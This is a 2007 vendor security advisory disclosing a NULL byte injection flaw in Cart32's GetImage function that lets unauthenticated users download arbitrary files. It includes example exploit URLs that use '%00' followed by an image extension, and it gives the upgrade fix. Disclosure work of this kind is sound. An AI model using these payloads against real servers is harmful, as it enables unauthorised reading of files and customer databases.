======================================================================== = Cart32 Arbitrary File Download Vulnerability = = Vendor Website: = http://www.cart32.com = = Affected Version: = -- All releases prior to and including v6.3 = = Public disclosure on Thursday 4th October 2007 = ======================================================================== Available online at: http://www.security-assessment.com/files/advisories/2007-10-04_Cart32_Ar bitrary_File_Download.pdf == Overview == Security-Assessment.com has discovered a highly critical vulnerability within the Cart32 administrative application. The vulnerability allows a remote unauthenticated user to arbitrarily download any file present on the same physical disk that Cart32 is installed on. The vulnerability stems from a NULL byte injection flaw within a file read function. == Exploitation == The function GetImage, part of c32web.exe displays various images from a supplied "ImageName" variable. http://host.com/scripts/c32web.exe/GetImage?ImageName=test.gif C32web.exe attempts to prevent arbitrary files from being disclosed by only returning files with an extension of .jpg, .gif, .png and .pdf. Any file, of any extension type can be downloaded when a NULL byte is injected into the ImageName variable with a valid file extension suffixed directly after. Example http://host.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.gi f http://host.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.jp g http://host.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.pd f http://host.com/scripts/c32web.exe/GetImage?ImageName=somefile.txt%00.pn g This vulnerability can be used to read any file on disk, including the cart32 database. == Solutions == A new build of Cart32 v6.4 is available to address this vulnerability. Security-Assessment.com highly recommends all Cart32 users to upgrade. == Credit == Discovered and advised to McMurtrey/Whitaker & Associates, Inc October 2007 by Paul Craig of Security-Assessment.com == Greetings == To all my fallen SA brothers. SoSD www.kiwicon.org : Will you be there? == About Security-Assessment.com == Security-Assessment.com is Australasia's leading team of Information Security consultants specialising in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients. Security-Assessment.com is committed to security research and development, and its team continues to identify and responsibly publish vulnerabilities in public and private software vendor's products. Members of the Security-Assessment.com R&D team are globally recognised through their release of whitepapers and presentations related to new security research. Security-Assessment.com is an Endorsed Commonwealth Government of Australia supplier and sits on the Australian Government Attorney-General's Department Critical Infrastructure Project panel. We are certified by both Visa and MasterCard under their Payment Card Industry Data Security Standard Programs. Paul Craig Security-Assessment.com